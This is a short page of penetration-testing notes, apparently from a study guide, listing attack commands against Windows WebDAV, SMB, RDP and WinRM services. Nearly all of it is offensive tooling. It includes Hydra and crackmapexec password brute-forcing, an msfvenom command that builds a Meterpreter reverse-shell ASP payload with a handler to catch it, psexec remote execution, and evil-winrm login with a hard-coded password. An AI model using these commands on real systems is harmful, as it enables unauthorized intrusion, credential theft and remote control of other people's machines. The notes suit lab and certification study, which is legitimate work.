Commands

Webdav

  • davtest

  • cadaver

  • hydra -L <userlist> -P <passlist> <ip> http-get /webdav

  • davtest -url http://<ip>/webdav -auth user:pass

  • cadaver <url>

  • msfvenom -p windows/meterpreter/reverse_tcp LHOT=<ip> LPORT=<port> -f asp > shell.asp

  • use multi/handler and set payload same as venom

smb

  • psexec.py <username>@<ip> <command>(cmd.exe)

  • msf ssh_login

  • nmap --script=smb-vuln-ms17-010

rdp

  • rdp_scanner msf module

  • hydra -L <userlist> -P <passlist> rdp://<ip> -s 3333

  • xfreerdp /u:<user> /p:<pass> /v:<ip>:<port>

winRM

  • crackmapexec winrm(protocol) <ip> -u <user-list> -p <pass-list>

  • evil-winrm.rb -u administrator -p tinkerbell -i <ip>

  • crackmapexec winrm <ip> -u administrator -p tinkerbell -x "whoami"

PreviousExploiting Windows VulnerabilitiesNextWindows Privilege Escalation

Last updated